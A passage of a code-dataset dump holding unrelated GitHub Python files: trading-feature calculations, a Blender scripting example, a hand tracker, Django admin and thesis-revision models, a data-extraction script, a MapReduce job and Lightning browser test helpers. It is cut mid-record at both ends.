smart_df[\"amount\"].sum()\n smart_ret = smart_df[\"m01_return_cls\"] @ smart_df[\"amount\"] / smart_df[\"amount\"].sum()\n res[\"smart\" + _id][t] = (smart_vwap / m01_before_t[\"vwap_cum\"].iloc[-1] - 1) * ret_scale\n res[\"smart\" + _id + \"_ret\"][t] = smart_ret\n\n # kyzq: amplitude\n sorted_amplitude_by_vwap = m01_before_t[[\"amplitude\", \"vwap\"]].sort_values(by=\"vwap\", ascending=False)\n for threshold_prop, top_bars in zip([0.1, 0.2, 0.5], [top01_bars, top02_bars, top05_bars]):\n _id = \"{:02d}\".format(int(10 * threshold_prop))\n res[\"vh\" + _id][t] = sorted_amplitude_by_vwap[\"amplitude\"].head(top_bars).mean()\n res[\"vl\" + _id][t] = sorted_amplitude_by_vwap[\"amplitude\"].tail(top_bars).mean()\n res[\"vd\" + _id][t] = res[\"vh\" + _id][t] - res[\"vl\" + _id][t]\n\n # kyzq: extremely return\n ret_min, ret_max, ret_median = m01_before_t[\"m01_return_cls\"].min(), m01_before_t[\"m01_return_cls\"].max(), m01_before_t[\"m01_return_cls\"].median()\n res[\"exr\"][t] = ret_max if (ret_max + ret_min) > (2 * ret_median) else ret_min\n idx_exr = m01_before_t[\"m01_return_cls\"].index[m01_before_t[\"m01_return_cls\"] == res[\"exr\"][t]][0]\n res[\"exrb01\"][t] = m01_before_t[\"m01_return_cls\"].iloc[idx_exr - 1] if idx_exr >= 1 else np.nan\n\n # kyzq: time center weighted by return\n pos_idx = m01_before_t[\"m01_return_cls\"] > 0\n neg_idx = m01_before_t[\"m01_return_cls\"] < 0\n pos_grp = m01_before_t.loc[pos_idx, \"m01_return_cls\"]\n neg_grp = m01_before_t.loc[neg_idx, \"m01_return_cls\"]\n pos_wgt = pos_grp.abs() / pos_grp.abs().sum()\n neg_wgt = neg_grp.abs() / neg_grp.abs().sum()\n res[\"gu\"][t] = pos_grp.index @ pos_wgt\n res[\"gd\"][t] = neg_grp.index @ neg_wgt\n res[\"g_tau\"][t] = res[\"gu\"][t] - res[\"gd\"][t]\n res[\"g_tau_abs\"][t] = abs(res[\"g_tau\"][t])\n\n # huxo: momentum adjusted by volatility\n m01_ret_return_mean = m01_before_t[\"m01_return\"].mean()\n m01_ret_return_std = m01_before_t[\"m01_return\"].std()\n res[\"mtm_vol_adj\"][t] = m01_ret_return_mean / m01_ret_return_std\n\n # --- --- --- --- ---\n # --- old style alphas\n sorted_vwap_and_ret_by_volume = m01_before_t[[\"vwap\", \"m01_return\", \"volume\"]].sort_values(by=\"volume\", ascending=False)\n skewness = m01_before_t[\"m01_return\"].skew()\n corr_top_01 = sorted_vwap_and_ret_by_volume.head(top01_bars).corr(method=\"spearman\")\n corr_top_02 = sorted_vwap_and_ret_by_volume.head(top02_bars).corr(method=\"spearman\")\n corr_top_05 = sorted_vwap_and_ret_by_volume.head(top05_bars).corr(method=\"spearman\")\n\n res[\"vwap_ret\"][t] = (m01_before_t[\"vwap\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n res[\"vwap_cum_ret\"][t] = (m01_before_t[\"vwap_cum\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n res[\"hgh_ret\"][t] = (m01_before_t[\"daily_high\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n res[\"low_ret\"][t] = (m01_before_t[\"daily_low\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n\n res[\"vtop01_ret\"][t] = sorted_vwap_and_ret_by_volume[\"m01_return\"].head(top01_bars).mean()\n res[\"vtop02_ret\"][t] = sorted_vwap_and_ret_by_volume[\"m01_return\"].head(top02_bars).tail(top02_bars - top01_bars).mean()\n res[\"vtop05_ret\"][t] = sorted_vwap_and_ret_by_volume[\"m01_return\"].head(top05_bars).tail(top05_bars - top02_bars).mean()\n\n res[\"vtop01_cvp\"][t] = corr_top_01.at[\"vwap\", \"volume\"]\n res[\"vtop02_cvp\"][t] = corr_top_02.at[\"vwap\", \"volume\"]\n res[\"vtop05_cvp\"][t] = corr_top_05.at[\"vwap\", \"volume\"]\n\n res[\"vtop01_cvr\"][t] = corr_top_01.at[\"m01_return\", \"volume\"]\n res[\"vtop02_cvr\"][t] = corr_top_02.at[\"m01_return\", \"volume\"]\n res[\"vtop05_cvr\"][t] = corr_top_05.at[\"m01_return\", \"volume\"]\n\n res[\"cvp\"][t] = m01_before_t[[\"volume\", \"vwap\"]].corr(method=\"spearman\").at[\"vwap\", \"volume\"]\n res[\"cvr\"][t] = m01_before_t[[\"volume\", \"m01_return\"]].corr(method=\"spearman\").at[\"m01_return\", \"volume\"]\n\n if bar_num_before_t >= 15 * 3:\n res[\"up\"][t] = 1 if m15[\"low\"][0] < m15[\"low\"][1] < m15[\"low\"][2] else 0\n res[\"dn\"][t] = 1 if m15[\"high\"][0] > m15[\"high\"][1] > m15[\"high\"][2] else 0\n elif bar_num_before_t >= 10 * 3:\n res[\"up\"][t] = 1 if m10[\"low\"][0] < m10[\"low\"][1] < m10[\"low\"][2] else 0\n res[\"dn\"][t] = 1 if m10[\"high\"][0] > m10[\"high\"][1] > m10[\"high\"][2] else 0\n elif bar_num_before_t >= 5 * 3:\n res[\"up\"][t] = 1 if m05[\"low\"][0] < m05[\"low\"][1] < m05[\"low\"][2] else 0\n res[\"dn\"][t] = 1 if m05[\"high\"][0] > m05[\"high\"][1] > m05[\"high\"][2] else 0\n else:\n res[\"up\"][t] = 0\n res[\"dn\"][t] = 0\n\n res[\"skewness\"][t] = skewness\n\n res_df = pd.DataFrame(res)\n return res_df\n\n\ndef save_to_sio_obj(t_sklearn_obj, t_path: str):\n obj = sio.dumps(t_sklearn_obj)\n with open(t_path, \"wb+\") as f:\n f.write(obj)\n return 0\n\n\ndef read_from_sio_obj(t_path: str):\n with open(t_path, \"rb\") as f:\n obj = f.read()\n return sio.loads(obj, trusted=True)\n","repo_name":"huxiaoou/Project_2023_06_EquityIndex_ML_V1","sub_path":"xfuns.py","file_name":"xfuns.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15843824519","text":"\"\"\"\nBasic Object Operations Example\n+++++++++++++++++++++++++++++++\n\nThis script demonstrates basic operations on object like creating new\nobject, placing it into a view layer, selecting it and making it active.\n\"\"\"\n\nimport bpy\n\nview_layer = bpy.context.view_layer\n\n# Create new light datablock.\nlight_data = bpy.data.lights.new(name=\"New Light\", type='POINT')\n\n# Create new object with our light datablock.\nlight_object = bpy.data.objects.new(name=\"New Light\", object_data=light_data)\n\n# Link light object to the active collection of current view layer,\n# so that it'll appear in the current scene.\nview_layer.active_layer_collection.collection.objects.link(light_object)\n\n# Place light to a specified location.\nlight_object.location = (5.0, 5.0, 5.0)\n\n# And finally select it and make it active.\nlight_object.select_set(True)\nview_layer.objects.active = light_object\n","repo_name":"blender/blender","sub_path":"doc/python_api/examples/bpy.types.Object.py","file_name":"bpy.types.Object.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"} +{"seq_id":"10903833202","text":"import cv2\nimport mediapipe as mp\n\ncarmera = cv2.VideoCapture(0)\nhand_Detector = mp.solutions.hands.Hands()\n\nwhile True:\n success, img = carmera.read()\n img = cv2.flip(img, 1)\n if success:\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n results = hand_Detector.process(img)\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp.solutions.drawing_utils.draw_landmarks(img, hand_landmarks, mp.solutions.hands.HAND_CONNECTIONS)\n\n cv2.imshow(\"Hand Tracking\", img)\n\n quit = cv2.waitKey(1)\n\n if quit == ord('q'):\n break\n\ncarmera.release()\ncv2.destroyAllWindows()","repo_name":"holycabbage/Hand-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"199040134","text":"from django.contrib import admin\r\nfrom django.contrib.admin import register\r\n\r\nfrom bbbs.afisha.filters import CitySelectFilter\r\nfrom bbbs.afisha.models import Event, EventParticipant\r\nfrom bbbs.common.models import City\r\nfrom bbbs.users.utils import AdminAndModersPermissionsMixin\r\n\r\n\r\nclass EventParticipantInline(\r\n AdminAndModersPermissionsMixin, admin.TabularInline\r\n):\r\n model = EventParticipant\r\n extra = 0\r\n verbose_name_plural = \"Список участников\"\r\n\r\n def get_readonly_fields(self, request, obj=None):\r\n if obj:\r\n if request.user.profile.is_moderator_reg:\r\n return [\"user\"]\r\n return super().get_readonly_fields(request, obj)\r\n\r\n def has_add_permission(self, request, obj=None):\r\n if request.user.profile.is_moderator_reg:\r\n return False\r\n return super().has_add_permission(request, obj)\r\n\r\n\r\n@register(Event)\r\nclass EventAdmin(AdminAndModersPermissionsMixin, admin.ModelAdmin):\r\n inlines = [\r\n EventParticipantInline,\r\n ]\r\n list_display = (\r\n \"id\",\r\n \"city\",\r\n \"address\",\r\n \"contact\",\r\n \"title\",\r\n \"description\",\r\n \"start_at\",\r\n \"end_at\",\r\n \"seats\",\r\n )\r\n list_filter = (\r\n CitySelectFilter,\r\n \"start_at\",\r\n )\r\n empty_value_display = \"-пусто-\"\r\n search_fields = (\"title\",)\r\n\r\n def get_queryset(self, request):\r\n if request.user.profile.is_moderator_reg:\r\n return Event.objects.filter(\r\n city__in=City.objects.filter(region=request.user.profile)\r\n )\r\n\r\n else:\r\n return Event.objects.all()\r\n\r\n def get_form(self, request, obj=None, **kwargs):\r\n form = super().get_form(request, obj, **kwargs)\r\n if request.user.profile.is_moderator_reg:\r\n form.base_fields[\"city\"].queryset = request.user.profile.region\r\n form.base_fields[\r\n \"start_at\"\r\n ].help_text = \"Время и дата указываются в формате местного времени\"\r\n form.base_fields[\r\n \"end_at\"\r\n ].help_text = \"Время и дата указываются в формате местного времени\"\r\n return form\r\n\r\n\r\n@register(EventParticipant)\r\nclass EventParticipantAdmin(AdminAndModersPermissionsMixin, admin.ModelAdmin):\r\n list_display = (\"user\", \"event\")\r\n\r\n empty_value_display = \"-пусто-\"\r\n list_select_related = (\r\n \"user\",\r\n \"event\",\r\n )\r\n","repo_name":"ivartm/bbbs","sub_path":"bbbs/afisha/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13873902549","text":"# itertools 잘 쓸수 있는지?\n# combination 중복x조합\n# permutation 중복조합\n# product 2개이상 모든 조합\nimport sys\nfrom itertools import combinations\n\nwhile True:\n arr = list(map(int, sys.stdin.readline().split()))\n if arr[0] == 0:\n break\n n = arr[0]\n arr.pop(0)\n\n l = list(combinations(arr, 6))\n\n for i in l:\n for j in i:\n print(j, end=' ')\n print()\n print()\n\n\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"홍익_자주동/3주차/로또.py","file_name":"로또.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33744173966","text":"from sqlalchemy import select\nfrom simta.classes import Error\nfrom simta import db, util, models\nimport os\nfrom flask import send_from_directory\nfrom sqlalchemy.sql import functions as funcs\n\nallowed_fields = {\n \"id\", \"sidang_id\", \"penguji_id\", \"nomor\", \"status\", \"created_at\", \"updated_at\", \"file_name\", \"detail\"\n}\nallowed_fields_penolakan = {\n \"file_name\", \"detail\"\n}\nallowed_filters = {\"status\"}\nenums = [\"status\"]\nstrs = [\"created_at\", \"updated_at\"]\n\nDEFAULT_SIDANG = True\nDEFAULT_PENGUJI = False\nDEFAULT_PENOLAKAN = True\nDEFAULT_PEMBIMBING = False\nDEFAULT_TA = True\nDEFAULT_MHS = True\nDEFAULT_REVISI_TERAKHIR = False\n\nWORKDIR = os.getenv(\"WORKDIR\", \"simta\")\nDIR_FILE_PENOLAKAN = os.path.abspath(f\"{WORKDIR}/assets/files/penolakan_revisi\")\nDIR_FILE_REVISI = os.path.abspath(f\"{WORKDIR}/assets/files/revisi\")\n\ndef apply_filters(stmt, **kwargs):\n return util.apply_filters(stmt, allowed_filters, kwargs)\n\n\ndef postprocess(revisi, sidang=DEFAULT_SIDANG, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, **kwargs):\n if penolakan:\n penolakan = revisi.penolakan\n #penolakan = penolakan[0] if penolakan else None\n if sidang:\n sidang = revisi.penguji.sidang\n\n revisi = util.filter_obj_dict(revisi, allowed_fields)\n util.resolve_enums(revisi, enums)\n util.resolve_strs(revisi, strs)\n\n if sidang:\n sidang = models.Sidang.postprocess(\n sidang, \n pembimbing=pembimbing, \n penguji=penguji, \n ta=ta,\n mhs=mhs, \n revisi_terakhir=revisi_terakhir,\n **kwargs\n )\n revisi[\"sidang\"] = sidang\n if penolakan:\n penolakan = util.filter_obj_dict(penolakan, allowed_fields_penolakan)\n revisi[\"penolakan\"] = penolakan\n\n return revisi\n\ndef _get(session, revisi_id, user_id):\n stmt = select(db.Revisi)\n stmt = stmt.filter_by(id=revisi_id)\n\n revisi = session.scalars(stmt).first()\n\n if not revisi:\n raise Error(\"Revisi not found\", 404)\n\n if revisi.penguji.id != user_id and revisi.penguji.sidang.ta.mhs.id != user_id:\n raise Error(\"Anda tidak berhak mengakses revisi ini\", 401)\n\n return revisi\n\n\ndef get(revisi_id, user_id, sidang=DEFAULT_SIDANG, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, **kwargs):\n with db.Session() as session:\n revisi = _get(session, revisi_id, user_id)\n\n revisi = postprocess(\n revisi, \n sidang=sidang,\n penguji=penguji,\n penolakan=penolakan,\n pembimbing=pembimbing,\n ta=ta,\n mhs=mhs,\n revisi_terakhir=revisi_terakhir,\n **kwargs\n )\n return revisi\n\n\ndef fetch_0(sidang_id, penguji_id, sidang=False, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, status=None, **kwargs):\n with db.Session() as session:\n sidang = models.Sidang._get(session, sidang_id)\n _penguji = [p for p in sidang.penguji if p.id==penguji_id]\n if not _penguji:\n raise Error(\"Anda bukan penguji TA ini\", 401)\n revisi = _penguji[0].revisi\n if status:\n revisi = [r for r in revisi if r.status==status]\n\n revisi = [postprocess(\n x,\n sidang=sidang,\n penguji=penguji,\n penolakan=penolakan,\n ta=ta,\n pembimbing=pembimbing,\n mhs=mhs,\n revisi_terakhir=revisi_terakhir,\n **kwargs\n ) for x in revisi]\n return revisi\n\ndef fetch(sidang_id, penguji_id, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, status=None, **kwargs):\n sidang = models.Sidang.get(\n sidang_id=sidang_id, \n user_id=penguji_id,\n ta=ta,\n pembimbing=pembimbing,\n mhs=mhs,\n penguji=penguji,\n revisi_terakhir=revisi_terakhir,\n revisi=True,\n **kwargs\n )\n if status:\n sidang[\"revisi\"] = [r for r in sidang[\"revisi\"] if r==status]\n return sidang\n\ndef terima(revisi_id, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.BARU and revisi.status != db.RevisiStatus.DILIHAT:\n raise Error(\"Anda sudah menerima/menolak revisi ini\", 403)\n \n if revisi.penguji.nilai is None:\n raise Error(\"Anda belum mengisi nilai\", 403)\n \n if revisi.penguji.nomor == 1 and revisi.penguji.sidang.ta.type==db.TAType.TA and revisi.penguji.sidang.ta.mhs.level == db.MhsLevel.S1 and (revisi.penguji.sidang.form_pomits is None or not revisi.penguji.sidang.form_pomits.is_filled):\n raise Error(\"Anda belum mengisi form POMITS\", 403)\n \n if not revisi.penguji.dosen.ttd:\n raise Error(\"Anda belum upload tanda tangan\", 403)\n\n revisi.status = db.RevisiStatus.DITERIMA\n revisi.updated_at = funcs.now()\n session.add(revisi)\n\n revisi.penguji.status = db.PengujiStatus.ACC\n session.add(revisi.penguji)\n\n ta = None\n belum_acc = [1 for p in revisi.penguji.sidang.penguji if p.status!=db.PengujiStatus.ACC]\n if not belum_acc:\n if revisi.penguji.sidang.status != db.SidangStatus.SELESAI:\n revisi.penguji.sidang.status = db.SidangStatus.SELESAI\n session.add(revisi.penguji.sidang)\n if revisi.penguji.sidang.ta.status != db.TAStatus.SELESAI:\n revisi.penguji.sidang.ta.status = db.TAStatus.SELESAI\n session.add(revisi.penguji.sidang.ta)\n\n if revisi.penguji.sidang.ta.type == db.TAType.PROPOSAL:\n sidang = revisi.penguji.sidang\n ta = db.TA(\n mhs_id=sidang.ta.mhs.id,\n judul=sidang.ta.judul,\n type=db.TAType.TA,\n status=db.TAStatus.BIMBINGAN\n )\n session.add(ta)\n for p in sidang.ta.pembimbing:\n p2 = db.Pembimbing(\n id=p.id,\n ta=ta,\n nomor=p.nomor,\n status=db.PembimbingStatus.BIMBINGAN\n )\n session.add(p2)\n\n session.commit()\n session.flush()\n\n ret = {}\n if ta:\n ret[\"ta_id\"] = ta.id\n return ret\n\ndef tolak(revisi_id, penguji_id, detail, file_name=None):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.BARU and revisi.status != db.RevisiStatus.DILIHAT:\n raise Error(\"Anda sudah menerima/menolak revisi ini\", 403)\n\n if file_name and not os.path.isfile(os.path.join(DIR_FILE_PENOLAKAN, f\"{revisi_id}.pdf\")):\n raise Error(\"Anda belum upload file penolakan\", 403)\n\n if revisi.penolakan:\n revisi.penolakan.detail = detail\n if file_name:\n revisi.penolakan.file_name = file_name\n session.add(revisi.penolakan)\n else:\n penolakan = db.PenolakanRevisi(\n id=revisi.id,\n detail=detail,\n file_name=file_name\n )\n session.add(penolakan)\n\n revisi.status = db.RevisiStatus.DITOLAK\n revisi.updated_at = funcs.now()\n session.add(revisi)\n\n session.commit()\n session.flush()\n\n\ndef upload_file_penolakan(revisi_id, file, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.BARU and revisi.status != db.RevisiStatus.DILIHAT:\n raise Error(\"Anda sudah menerima/menolak revisi ini\", 403)\n\n file.save(f\"{DIR_FILE_PENOLAKAN}/{revisi_id}.pdf\")\n\ndef download_file_penolakan(revisi_id, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.DITOLAK:\n raise Error(\"Revisi tidak ditolak\", 403)\n\n if not revisi.file_name:\n raise Error(\"Revisi ditolak tanpa file\", 403)\n\n file_name = f\"{revisi_id}.pdf\"\n if revisi.file_name and not os.path.isfile(os.path.join(DIR_FILE_PENOLAKAN, file_name)):\n raise Error(\"File penolakan hilang\", 404)\n\n return send_from_directory(directory=models.Revisi.DIR_FILE_PENOLAKAN, path=file_name, as_attachment=True)\n\n \ndef download_file_revisi(revisi_id, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n file_name = f\"{revisi_id}.pdf\"\n if revisi.file_name and not os.path.isfile(os.path.join(DIR_FILE_REVISI, file_name)):\n raise Error(\"File revisi hilang\", 404)\n\n return send_from_directory(directory=models.Revisi.DIR_FILE_REVISI, path=file_name, as_attachment=True)","repo_name":"R-N/simta-backend","sub_path":"simta/models/Revisi.py","file_name":"Revisi.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22447142431","text":"\"\"\"\n\nAuthor Name: Nasooh Ismail\nVersion: 1.0\nInput: station_dictionary.csv\nOutput: obs_t2.csv, station_dictionary.csv(overwrite)\nUpdate:\nthis script will extract daily data from the obs_t2.csv and save each days data in a seperate file with the file name _t2_obs.csv\nwriiten by nasooh for the project probilistic_nowcasting\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom pytz import UTC\nimport os\n\n\ndf = pd.read_csv('./output/obs_t2.csv')\ndf = df.iloc[:, 1:]\nstart_date = pd.to_datetime('2020-07-28 16:00') #convert 2020/07/30 00:00 to UTC = 2020/07/28 16:00\nend_date = start_date + pd.DateOffset(hours=767)\ndate_index = pd.date_range(start=start_date, end=end_date, freq='H')\n\n# Assign the datetime index to the DataFrame\ndf.index = date_index\n\n# Display the updated DataFrame\nprint(df.head())\n\n\n# Create the output directory if it doesn't exist\noutput_dir = './output/obs_csv'\nos.makedirs(output_dir, exist_ok=True)\n\n# Convert the index to a pandas DatetimeIndex\ndf.index = pd.DatetimeIndex(df.index)\n\n# Iterate over each day and save data for each station as a separate CSV file\nfor date in pd.DatetimeIndex(df.index):\n # Filter the DataFrame for the current date\n date_data = df[df.index.date == date]\n \n # Extract the year, month, and day for the file name\n year = str(date.year)\n month = str(date.month).zfill(2)\n day = str(date.day).zfill(2)\n \n # Generate the file name\n file_name = f'{year}{month}{day}_t2_obs.csv'\n \n # Create the full file path\n file_path = os.path.join(output_dir, file_name)\n \n # Save the data for the current date as a CSV file\n date_data.to_csv(file_path, index_label='valid_time')\n","repo_name":"nasooh-ismail/T2_prob_nowcast_pysteps","sub_path":"src/S4_extract_dailydata_from_obs_t2.py","file_name":"S4_extract_dailydata_from_obs_t2.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5698989796","text":"# Baekjoon Online Judge - 1504번. 특정한 최단 경로\nimport heapq\n\n\ndef dijkstra(n):\n h = []\n dist = [INF] * (N + 1)\n dist[n] = 0\n heapq.heappush(h, (0, n))\n while h:\n # 현재 노드까지의 거리 node_dist, 현재 노드\n node_dist, node = heapq.heappop(h)\n # 현재노드까지의 거리가 최소 보다 크다면 끝\n if dist[node] < node_dist:\n continue\n\n for v, w in graph[node]:\n cost = node_dist + w\n # 현재까지의 거리가 저장된 최소 거리보다 작다면\n if cost < dist[v]:\n # 갱신해준다\n dist[v] = cost\n heapq.heappush(h, (cost, v))\n return dist\n\n\nN, E = map(int, input().split())\ngraph = [[] for _ in range(N+1)]\nINF = 10**9\n\nfor _ in range(E):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n graph[b].append((a, c))\n\nv1, v2 = map(int, input().split())\nstart_1 = dijkstra(1)\nstart_v1 = dijkstra(v1)\nstart_v2 = dijkstra(v2)\n\n# 1 -> v1 -> v2 -> N\nresult1 = start_1[v1] + start_v1[v2] + start_v2[N]\n# 1 -> v2 -> v1 -> N\nresult2 = start_1[v2] + start_v2[v1] + start_v1[N]\n\nans = min(result1, result2)\n# ans != INF가 안되는 이유 => 그러한 경로가 없을 때\n# INF이여야 -1을 출력하니까 적은걸로 표현해야한다\nif ans < INF:\n print(ans)\nelse:\n print(-1)\n","repo_name":"wnstj-yang/Algorithm","sub_path":"BOJ/BOJ_1504.py","file_name":"BOJ_1504.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27014143610","text":"import MapReduce\nimport sys\n\n\"\"\"\nWord Count Example in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\nmaxx = 0;\nmaxy = 0;\n\ndef mapper(record):\n global maxx, maxy\n # this assumes both matrixs have the same dimensions.\n index = 0\n #print record\n while index < 5:\n if record[0] == \"a\":\n mr.emit_intermediate(str(record[1])+str(index), record)\n else:\n mr.emit_intermediate(str(index)+str(record[2]), record)\n index += 1\n\ndef reducer(key, list_of_values):\n arrayA = [0 for x in xrange(5)]\n arrayB = [0 for x in xrange(5)]\n posx = int(key[0])\n posy = int(key[1])\n # recreate matrix\n for item in list_of_values:\n if item[0] == \"a\":\n arrayA[item[2]] = item[3]\n else:\n arrayB[item[1]] = item[3]\n index = 0 \n product = 0\n# print key,list_of_values\n# print \"a\",arrayA\n# print \"b\",arrayB\n while index < 5:\n product += arrayA[index] * arrayB[index]\n index += 1\n \n# print \"product\",product\n mr.emit((posx, posy, product))\n# mr.emit((row, column, product))\n\n# print resultsM\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","repo_name":"kietlieng/Bigdata-DataScienceCourse","sub_path":"assignment3/assign3_6-matrix-v2-Improved.py","file_name":"assign3_6-matrix-v2-Improved.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22720648056","text":"import json\nimport os\nfrom contextlib import contextmanager\nfrom time import sleep\nfrom typing import Generator\n\nimport pytest\nimport requests\nfrom lightning.app.testing.config import _Config\nfrom lightning.app.utilities.cloud import _get_project\nfrom lightning.app.utilities.imports import _is_playwright_available, requires\nfrom lightning.app.utilities.network import LightningClient\nfrom lightning_cloud.openapi import V1LightningworkState\nfrom lightning_cloud.openapi.rest import ApiException\n\nif _is_playwright_available():\n import playwright\n from playwright.sync_api import HttpCredentials, Page, expect, sync_playwright\n\n\n@requires(\"playwright\")\n@contextmanager\ndef get_gallery_app_page(app_name) -> Generator:\n with sync_playwright() as p:\n browser = p.chromium.launch(timeout=5000, headless=bool(int(os.getenv(\"HEADLESS\", \"0\"))))\n payload = {\n \"apiKey\": _Config.api_key,\n \"username\": _Config.username,\n \"duration\": \"120000\",\n }\n context = browser.new_context(\n http_credentials=HttpCredentials(\n {\n \"username\": os.getenv(\"LAI_USER\", \"\"),\n \"password\": os.getenv(\"LAI_PASS\", \"\"),\n }\n ),\n record_video_dir=os.path.join(_Config.video_location, app_name),\n record_har_path=_Config.har_location,\n )\n gallery_page = context.new_page()\n res = requests.post(_Config.url + \"/v1/auth/login\", data=json.dumps(payload))\n token = res.json()[\"token\"]\n gallery_page.goto(_Config.url)\n gallery_page.evaluate(\n \"\"\"data => {\n window.localStorage.setItem('gridUserId', data[0]);\n window.localStorage.setItem('gridUserKey', data[1]);\n window.localStorage.setItem('gridUserToken', data[2]);\n }\n \"\"\",\n [_Config.id, _Config.key, token],\n )\n\n for retry_count in range(5):\n try:\n gallery_page.goto(f\"{_Config.url}/apps\")\n except playwright._impl._api_types.TimeoutError as ex:\n try_ex = ex\n else:\n try_ex = None\n break\n if try_ex:\n raise try_ex\n\n # Find the app in the gallery\n gallery_page.locator(f\"text={app_name}\").first.click()\n yield gallery_page\n\n\n@requires(\"playwright\")\n@contextmanager\ndef launch_from_gallery_app_page(gallery_page) -> Generator:\n with gallery_page.context.expect_page() as page_catcher:\n gallery_page.locator(\"text=Try it free\").click()\n\n app_page = page_catcher.value\n app_page.wait_for_load_state(timeout=0)\n\n try:\n yield app_page\n except KeyboardInterrupt:\n pass\n\n\n@requires(\"playwright\")\n@contextmanager\ndef clone_and_run_from_gallery_app_page(app_gallery_page) -> Generator:\n with app_gallery_page.expect_navigation():\n app_gallery_page.locator(\"text=Clone & Run\").click()\n\n admin_page = app_gallery_page\n\n sleep(5)\n # Scroll to the bottom of the page. Used to capture all logs.\n admin_page.evaluate(\n \"\"\"\n var intervalID = setInterval(function () {\n var scrollingElement = (document.scrollingElement || document.body);\n scrollingElement.scrollTop = scrollingElement.scrollHeight;\n }, 200);\n\n if (!window._logs) {\n window._logs = [];\n }\n\n if (window.logTerminals) {\n Object.entries(window.logTerminals).forEach(\n ([key, value]) => {\n window.logTerminals[key]._onLightningWritelnHandler = function (data) {\n window._logs = window._logs.concat([data]);\n }\n }\n );\n }\n \"\"\"\n )\n\n # TODO: Add a timeout here.\n while True:\n try:\n open_app_button = admin_page.locator(\"text=Open App\")\n open_app_button.wait_for(timeout=1000)\n\n if open_app_button.is_disabled():\n sleep(5)\n continue\n\n with admin_page.context.expect_page() as page_catcher:\n open_app_button.click()\n app_page = page_catcher.value\n app_page.wait_for_load_state(timeout=0)\n break\n except (\n playwright._impl._api_types.Error,\n playwright._impl._api_types.TimeoutError,\n ):\n pass\n\n def fetch_logs() -> str:\n return admin_page.evaluate(\"window._logs;\")\n\n lightning_app_id = str(app_page.url).split(\".\")[0].split(\"//\")[-1]\n print(f\"The Lightning Id Name : [bold magenta]{lightning_app_id}[/bold magenta]\")\n\n # Sleep until the file server is running\n client = LightningClient()\n project = _get_project(client)\n\n running = False\n\n while not running:\n sleep(10)\n\n works = client.lightningwork_service_list_lightningwork(\n project_id=project.project_id,\n app_id=lightning_app_id,\n ).lightningworks\n\n for work in works:\n if work.name == \"root.file_upload\":\n if work.status.phase == V1LightningworkState.RUNNING:\n running = True\n\n # Sleep to give the server time to start\n sleep(180)\n\n try:\n yield admin_page, app_page, fetch_logs\n except KeyboardInterrupt:\n pass\n finally:\n print(f\"##################### DELETING APP {lightning_app_id}\")\n printed_logs = []\n for log in fetch_logs():\n if log not in printed_logs:\n printed_logs.append(log)\n print(log.split(\"[0m\")[-1])\n stop_button = admin_page.locator(\"text=Stop\")\n try:\n stop_button.wait_for(timeout=3 * 1000)\n stop_button.click()\n except (\n playwright._impl._api_types.Error,\n playwright._impl._api_types.TimeoutError,\n 